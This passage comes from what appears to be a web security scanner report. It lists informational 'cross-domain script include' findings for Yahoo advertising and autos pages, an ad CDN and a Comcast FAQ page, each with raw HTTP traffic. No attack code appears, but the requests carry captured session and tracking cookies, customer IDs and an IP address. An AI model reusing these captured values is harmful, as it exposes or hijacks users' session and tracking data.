!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f8^!$?i5!!!!%=3`c_"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: vuday1=BgvR*4M6Eq!79C8M#n45; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: uid=uid=0437c6f8-d886-11e0-ae4a-78e7d15f7c8c&_hmacv=1&_salt=1842979857&_keyid=k1&_hmac=a0feea0b76b539d7f6f3647d41d7513f336eb436; path=/; expires=Thu, 06-Oct-2011 12:44:52 GMT
Set-Cookie: lifb=M5Jkn#DZT*WZK^n; path=/; expires=Tue, 06-Sep-2011 16:44:52 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:44:52 GMT
Pragma: no-cache
Content-Length: 1242
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10834543);}
</script><script type="text/javascript" src="http://tags.mathtag.com/view/js/?strat=109185&cr=126413&supply=99&random=1315313092&rfr=http%3A%2F%2Fsports%2Eyahoo%2Ecom%2Fnfl%2Fblog%2Fshutdown%5Fcorner%2Fpost%2Ftiki%2Dbarber%2Dremains%2Dunemployed%2Dand%2Dsad%3Furn%3Dnfl%2Dwp6443&rfid=238940&ymct=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGVUMtuo0AQ%2EJk9rQzDPMAQa7QaG79iE7ABxfhiAUPAmDc42Pv164RstNftQ3d1taqkLognWhD4PJQkJZK5HATKBGKEo1CWNMRH0mQyUTSECJaJOjpsXJ2ZZ3fJpu9u7bLP2rzyzYAYiz%2DAN2yW%2DjH1mbmbrz55xjrLtYfjjFnpl34g%2ErPr%2EJmtvzSP2Q9wuysWVrqefpvp7P6SsrvnzKXt646YutcZziIzZhLx0vVt64Tk6PCL4Xi3Y%2D4i81vI6CjpuuoJgDgrAz8T%2EYaLdz8pSzEsc2CvlxTKKcSlXMvAoGN1rGIsQkKIDNH4AZAGVY2ICAGdtlXZdC2wKZIQesSKCHp6Aad71lFWa3O12py8%2Dvd7vNw7SgbfjEq3G%2D9IgEc9tjJNMD9YFGIo44dehWBLxfzZMSVLz6aniu2r1MnEPt2x2kj42L%2EI%2DSKImV4nNphSaYFuVpeqUdYL4HmwgVhSIZQ0DBHYUL66Huaxs92RcGkWdhKvidb2gFEFKRARGeypBH7%2D%2DJvH8Mw%2EWRRvGQiyMgZtcu142RensGyKqAFV2XagO1%2EOQuA3QdQITZT756IVrkWUV1l5j7jgF1xoff7r2hT0YST0lUII%2EgN86sV0%2C"></script>
...[SNIP]...

16.10. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iframe3?XKUDAOiUGABiUZgAAAAAAAnhJQAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAXLsgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC-1vKFRPquCrnRbevBKa2aOyXC53U8C3Yzkg4BAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15jnbi3cd%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320284%2FL%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%2FB%3DFBSePtj8fcY-%2FJ%3D1315313084968840%2FK%3DtHb_lv57MAgihszSpmJhkw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%26_salt%3D2271271428%26cb%3D1315313084968840%26i%3D140509%26r%3D0,04162e62-d886-11e0-b0bb-78e7d1fa057c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=F8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ&ad_type=iframe&ad_size=728x90&site=140509&section_code=14445127&cb=1315313084968840&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15jnbi3cd/M=787833.14445127.14291894.22/D=sports/S=2022092242:N/_ylt=Aq9E8pK_YqzvgGRT6l1fMpDSrYZ4/Y=YAHOO/EXP=1315320284/L=F8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ/B=FBSePtj8fcY-/J=1315313084968840/K=tHb_lv57MAgihszSpmJhkw/A=6261245/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#F!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!#=3f8^!$?i5!!!!%=3`c_"; ih="b!!!!*!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8_!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'!4ZV5!!!!#=3f8^"; vuday1=BgvR*4M6Eq!79C8M#n45; pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8_~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; liday1=*YKlx8SkUq!79C8gM+s%; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:55 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0192.rm.sp2
Set-Cookie: ih="b!!!!+!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!4=3f8a!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!38Yq!!!!#=3f8a!3Eo4!!!!#=3f.'!4ZV5!!!!$=3f8_"; path=/; expires=Thu, 05-Sep-2013 12:44:55 GMT
Set-Cookie: vuday1=BgvR5!79C8'$[q]; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: lifb=BcN3V!yANGM5Jkn$AVp-2AQ4:; path=/; expires=Tue, 06-Sep-2011 16:44:55 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:44:55 GMT
Pragma: no-cache
Content-Length: 2706
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9982306);}
</script><IFRAME SRC="htt
...[SNIP]...
0&crID=126548&pubICode=2145116&pub=24284&partnerID=77&redirectURL=;ord=1315313095?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3220.aod-invite.comOX15921/B5642080.11;abr=!ie;sz=728x90;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153130951610984-126548&campID=106300&crID=126548&pubICode=2145116&pub=24284&partnerID=77&redirectURL=;ord=1315313095?">
</SCRIPT>
...[SNIP]...

16.11. http://autos.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autos.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: autos.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:50 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 3
Server: YTS/1.19.5
Proxy-Connection: keep-alive
Content-Length: 145087

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<meta http-equiv="Content-Type" conten
...[SNIP]...
lobal-min-43868.css&pc/autos/p/mmt/mmt_global-min-42230.css&pc/autos/p/common/autos_nav-min-44107.css&pc/autos/p/homepage/homepage-min-44216.css&pc/autos/p/common/autos_global-delta_2011-07-22.css" />
<script type="text/javascript" src="http://l.yimg.com/zz/combo?yui:3.1.1/build/yui/yui.js"></script>
...[SNIP]...
</script><script charset='utf-8' type='text/javascript' src='http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js'></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved --><script type="text/javascript"src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved --><script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.8.0r4/build/yahoo/yahoo-min.js&d/lib/yui/2.8.0r4/build/get/get-min.js&d/lib/yui/2.8.0r4/build/dom/dom-min.js&d/lib/yui/2.8.0r4/build/selector/selector-min.js&d/lib/yui/2.8.0r4/build/event/event-min.js&d/lib/yui/2.8.0r4/build/element/element-min.js&d/lib/yui/2.8.0r4/build/button/button.js&d/lib/yui/2.8.0r4/build/connection/connection-min.js&d/lib/yui/2.8.0r4/build/json/json-min.js&d/lib/yui/2.8.0r4/build/container/container-min.js&d/lib/yui/2.8.0r4/build/animation/animation-min.js&d/lib/yui/2.8.0r4/build/imageloader/imageloader-min.js&d/lib/ult/strip_1.12.js&pc/autos/p/common/autos_global-min-44130.js&pc/autos/p/mmt/autos_mmt_global-min-41705.js&pc/autos/p/common/autos_mvc-min-41705.js&pc/autos/p/common/autos_tabview-min-42088.js&d/lib/yat/yep/player_20100605.js&pc/autos/p/common/autos_video-min-41705.js&pc/autos/p/homepage/homepage-min-43199.js&pc/autos/p/mmt/autos_carousel-min-41705.js&pc/autos/p/homepage/userpickscarousel-min-43575.js&d/lib/darla/fc_0.2.9.js&d/lib/darla/util_0.2.6.js&d/lib/darla/renderers/complex_renderer_0.3.0.js"></script>
...[SNIP]...

16.12. http://autos.yahoo.com/bentley/continental-gtc/2011/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autos.yahoo.com
Path:   /bentley/continental-gtc/2011/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /bentley/continental-gtc/2011/ HTTP/1.1
Host: autos.yahoo.com
Proxy-Connection: keep-alive
Referer: http://autos.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; AutosBH=bh=W1siMjAxMTA5MDZfMDU6NDU6NDIiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9tZC5waHA_ZW49dXRmLTgiXSxbIjIwMTEwOTA2XzA1OjQ1OjQwIiwiYXV0b3MueWFob28uY29tXC9kYXJsYVwvZmMucGhwP2NiPVlBSE9PLmFkcy5kYXJsYS5fbG9hZGVkJmFtcDtwPWF1dG9zJmFtcDtmPTk2NDMyOTAwJmFtcDtsPUxSRUMmYW1wO2VuPXV0Zi04JmFtcDtucHY9MSZhbXA7cm49MTMxNTMzMTE0MDc3MyZhbXA7ZW09JTdCJTIyc2l0ZS1hdHRyaWJ1dGUlMjIlM0ElMjJjb250ZW50JTNEJTI3YXV0b3NjaCUzRCUyMiUyMiUyMGNvbnRlbnQlM0QlMjJBbGwlMjBDYXJzJTNCJTIyJTI3JTIyJTdEJmFtcDt0X2U9MSZhbXA7LmludGw9dXMiXV0-&ver=1; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:47:59 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: private
Age: 3
Server: YTS/1.19.5
Proxy-Connection: keep-alive
Content-Length: 90155

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<meta http-equiv="Content-Type" conte
...[SNIP]...
.css&pc/autos/p/mmt/modeloverview-min-42951.css&pc/autos/p/common/autos_reviews-min-42838.css&pc/autos/p/common/autos_write_review-min-43468.css&pc/autos/p/common/autos_global-delta_2011-07-22.css" />
<script type="text/javascript" src="http://l.yimg.com/zz/combo?yui:3.1.1/build/yui/yui.js"></script>
...[SNIP]...
</script><script charset='utf-8' type='text/javascript' src='http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js'></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved --><script type="text/javascript"src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved --><script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.8.0r4/build/yahoo/yahoo-min.js&d/lib/yui/2.8.0r4/build/get/get-min.js&d/lib/yui/2.8.0r4/build/dom/dom-min.js&d/lib/yui/2.8.0r4/build/selector/selector-min.js&d/lib/yui/2.8.0r4/build/event/event-min.js&d/lib/yui/2.8.0r4/build/element/element-min.js&d/lib/yui/2.8.0r4/build/button/button.js&d/lib/yui/2.8.0r4/build/connection/connection-min.js&d/lib/yui/2.8.0r4/build/json/json-min.js&d/lib/yui/2.8.0r4/build/container/container-min.js&d/lib/yui/2.8.0r4/build/dragdrop/dragdrop-min.js&d/lib/yui/2.8.0r4/build/animation/animation-min.js&d/lib/ult/strip_1.12.js&pc/autos/p/common/autos_global-min-44130.js&pc/autos/p/mmt/autos_mmt_global-min-41705.js&a/lib/ush/ygsh_1.0.3.js&a/ult/ylc_1.9.js&pc/autos/p/mmt/autos_model-min-42790.js&pc/autos/p/common/autos_write_review-min-44131.js&pc/autos/p/mmt/autos_resize_list_modules-min-40691.js&pc/autos/p/common/autos_mvc-min-41705.js&d/lib/darla/fc_0.2.9.js&d/lib/darla/util_0.2.6.js&d/lib/darla/renderers/complex_renderer_0.3.0.js"></script>
...[SNIP]...

16.13. http://cdn.optmd.com/V2/80181/197812/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.optmd.com
Path:   /V2/80181/197812/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /V2/80181/197812/index.html HTTP/1.1
Host: cdn.optmd.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=3;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 21 Jun 2010 20:12:42 GMT
ETag: "800a0-152-4898fed55e280"
Accept-Ranges: bytes
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 338
Date: Tue, 06 Sep 2011 12:45:57 GMT
Connection: close

<html>
<head><meta http-equiv="CACHE-CONTROL" content="NO-CACHE" /><title>Capella University</title></head>
<body style="margin: 0px; padding: 0px;">
<script type="text/javascript" src="http://ad.doubleclick.net/adj/N5956.Casale/B3941858.3;sz=300x250;click0=http://c.casalemedia.com/c/4/1/80181/;ord=121245141?"></script>
...[SNIP]...

16.14. http://cdn.optmd.com/V2/80181/197813/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.optmd.com
Path:   /V2/80181/197813/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /V2/80181/197813/index.html HTTP/1.1
Host: cdn.optmd.com
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 21 Jun 2010 19:07:15 GMT
ETag: "dd49d6-151-4898f03449ec0"
Accept-Ranges: bytes
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 337
Date: Tue, 06 Sep 2011 12:45:59 GMT
Connection: close

<html>
<head><meta http-equiv="CACHE-CONTROL" content="NO-CACHE" /><title>Capella University</title></head>
<body style="margin: 0px; padding: 0px;">
<script type="text/javascript" src="http://ad.doubleclick.net/adj/N5956.Casale/B3941858.4;sz=728x90;click0=http://c.casalemedia.com/c/2/1/80181/;ord=965478884?"></script>
...[SNIP]...

16.15. http://customer.comcast.com/Pages/FAQViewer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://customer.comcast.com
Path:   /Pages/FAQViewer.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Pages/FAQViewer.aspx?Guid=f8578a5e-0241-452c-ba18-278c838ac946 HTTP/1.1
Host: customer.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; ServerID=1035; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; mbox=session#1315327839174-766376#1315331754|PC#1315327839174-766376.19#1316539494|check#true#1315329954; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331694799%3B%20gpv_07%3Dcorporate%2520-%2520learn%2520-%2520xfinity%2520-%2520wireless-mobile-broadband%2520%7C1315331694819%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; VISITORID=2086762009; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"pv":8,"lc":{"d0":{"v":8,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}

Response

HTTP/1.0 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:25:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 38733


